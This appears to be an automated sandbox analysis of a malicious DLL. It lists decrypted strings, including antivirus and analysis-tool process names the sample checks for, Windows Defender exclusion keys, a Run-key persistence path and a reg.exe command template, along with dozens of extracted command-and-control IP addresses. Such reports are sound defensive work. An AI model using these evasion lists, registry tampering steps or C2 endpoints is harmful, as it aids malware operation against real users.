Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: type=0x%04X
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: snxhk_border_mywnd
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ROOT\CIMV2
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: https
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: fshoster32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: kernelbase.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: regsvr32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %s\system32\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Process
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: rundll32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LOCALAPPDATA
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cmd.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: APPDATA
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: select
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: mcshield.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: advapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ws2_32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .cfg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Product
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WQL
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wininet.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LastBootUpTime
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: urlmon.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Create
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_PnPEntity
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Initializing database...
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: winsta0\default
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .dat
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WBJ_IGNORE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: next
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wpcap.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/pjpeg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: fmon.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: vbs
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aswhooka.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SysWOW64
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: mpr.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/gif
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: crypt32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ntdll.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: open
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SystemRoot
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cscript.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: C:\INTERNAL\__empty
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_PhysicalMemory
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ALLUSERSPROFILE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/jpeg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LocalLow
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: displayName
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: shlwapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CommandLine
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: kernel32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SubmitSamplesConsent
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: 1234567890
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wbj.go
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_DiskDrive
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: System32
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Name
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WRSA.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: c:\\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SpyNetReporting
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: FALSE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aswhookx.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Packages
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: application/x-shockwave-flash
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: RepUx.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Winsta0
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: avp.exe;kavtray.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: root\SecurityCenter2
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: MsMpEng.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: userenv.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: csc_ui.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: \\.\pipe\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: pstorec.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: NTUSER.DAT
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: from
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: netapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: gdi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: setupapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: iphlpapi.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CrAmTray.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_ComputerSystem
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: user32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: \sf2.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: egui.exe;ekrn.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Software\Microsoft
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %S.%06d
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: bcrypt.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wtsapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: shell32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: TRUE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Bios
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: c:\hiberfil.sysss
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: /
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ByteFence.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: type=0x%04X
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: snxhk_border_mywnd
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ROOT\CIMV2
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: https
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: fshoster32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: kernelbase.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: regsvr32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %s\system32\
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Process
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: rundll32.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LOCALAPPDATA
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: cmd.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: APPDATA
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: select
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: mcshield.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: advapi32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ws2_32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .cfg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_Product
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WQL
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wininet.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: LastBootUpTime
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: urlmon.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Create
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Win32_PnPEntity
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Initializing database...
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: winsta0\default
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: .dat
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: WBJ_IGNORE
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: next
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: wpcap.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/pjpeg
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: fmon.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: vbs
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: aswhooka.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: SysWOW64
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: mpr.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: image/gif
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: crypt32.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: ntdll.dll
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: open
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 17.2.rundll32.exe.4940000.1.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10035030 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,	3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000C0B0 mv_cast5_crypt2,	3_2_1000C0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000B0D0 mv_camellia_crypt,	3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,	3_2_10013100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000C1B0 mv_cast5_crypt,	3_2_1000C1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,	3_2_100132D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,	3_2_10002480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,	3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,	3_2_100084B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10002523 mv_aes_crypt,	3_2_10002523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001363B mv_encryption_init_info_alloc,	3_2_1001363B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000867B mv_blowfish_crypt_ecb,	3_2_1000867B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100136FB mv_encryption_init_info_alloc,	3_2_100136FB

Source: F072.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.5:49731 version: TLS 1.2

Source: F072.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_04949DA8 FindFirstFileW,FindNextFileW,

17_2_04949DA8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 12.172.173.82:50001
Source: Malware configuration extractor	IPs: 178.175.187.254:443
Source: Malware configuration extractor	IPs: 65.95.141.84:2222
Source: Malware configuration extractor	IPs: 205.237.67.69:995
Source: Malware configuration extractor	IPs: 83.110.223.61:443
Source: Malware configuration extractor	IPs: 193.253.100.236:2222
Source: Malware configuration extractor	IPs: 27.0.48.233:443
Source: Malware configuration extractor	IPs: 102.159.188.125:443
Source: Malware configuration extractor	IPs: 71.38.155.217:443
Source: Malware configuration extractor	IPs: 58.186.75.42:443
Source: Malware configuration extractor	IPs: 76.178.148.107:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2087
Source: Malware configuration extractor	IPs: 114.143.176.236:443
Source: Malware configuration extractor	IPs: 51.14.29.227:2222
Source: Malware configuration extractor	IPs: 59.28.84.65:443
Source: Malware configuration extractor	IPs: 173.88.135.179:443
Source: Malware configuration extractor	IPs: 103.144.201.56:2078
Source: Malware configuration extractor	IPs: 96.87.28.170:2222
Source: Malware configuration extractor	IPs: 105.186.128.181:995
Source: Malware configuration extractor	IPs: 176.142.207.63:443
Source: Malware configuration extractor	IPs: 151.62.238.176:443
Source: Malware configuration extractor	IPs: 12.172.173.82:32101
Source: Malware configuration extractor	IPs: 122.186.210.254:443
Source: Malware configuration extractor	IPs: 82.125.44.236:2222
Source: Malware configuration extractor	IPs: 84.108.200.161:443
Source: Malware configuration extractor	IPs: 76.16.49.134:443
Source: Malware configuration extractor	IPs: 70.28.50.223:32100
Source: Malware configuration extractor	IPs: 12.172.173.82:465
Source: Malware configuration extractor	IPs: 76.170.252.153:995
Source: Malware configuration extractor	IPs: 184.182.66.109:443
Source: Malware configuration extractor	IPs: 78.92.133.215:443
Source: Malware configuration extractor	IPs: 50.68.204.71:993
Source: Malware configuration extractor	IPs: 186.75.95.6:443
Source: Malware configuration extractor	IPs: 113.11.92.30:443
Source: Malware configuration extractor	IPs: 70.28.50.223:3389
Source: Malware configuration extractor	IPs: 98.145.23.67:443
Source: Malware configuration extractor	IPs: 85.57.212.13:3389
Source: Malware configuration extractor	IPs: 50.68.186.195:443
Source: Malware configuration extractor	IPs: 47.205.25.170:443
Source: Malware configuration extractor	IPs: 12.172.173.82:993
Source: Malware configuration extractor	IPs: 12.172.173.82:22
Source: Malware configuration extractor	IPs: 69.242.31.249:443
Source: Malware configuration extractor	IPs: 81.101.185.146:443
Source: Malware configuration extractor	IPs: 79.168.224.165:2222
Source: Malware configuration extractor	IPs: 75.143.236.149:443
Source: Malware configuration extractor	IPs: 14.192.241.76:995
Source: Malware configuration extractor	IPs: 86.195.14.72:2222
Source: Malware configuration extractor	IPs: 81.229.117.95:2222
Source: Malware configuration extractor	IPs: 220.240.164.182:443
Source: Malware configuration extractor	IPs: 73.29.92.128:443
Source: Malware configuration extractor	IPs: 12.172.173.82:21
Source: Malware configuration extractor	IPs: 96.56.197.26:2222
Source: Malware configuration extractor	IPs: 75.109.111.89:443
Source: Malware configuration extractor	IPs: 76.86.31.59:443
Source: Malware configuration extractor	IPs: 201.244.108.183:995
Source: Malware configuration extractor	IPs: 68.203.69.96:443
Source: Malware configuration extractor	IPs: 124.122.47.148:443
Source: Malware configuration extractor	IPs: 122.184.143.86:443
Source: Malware configuration extractor	IPs: 92.186.69.229:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2083
Source: Malware configuration extractor	IPs: 89.129.109.27:2222
Source: Malware configuration extractor	IPs: 147.147.30.126:2222
Source: Malware configuration extractor	IPs: 125.99.76.102:443
Source: Malware configuration extractor	IPs: 88.126.94.4:50000
Source: Malware configuration extractor	IPs: 151.65.167.77:443
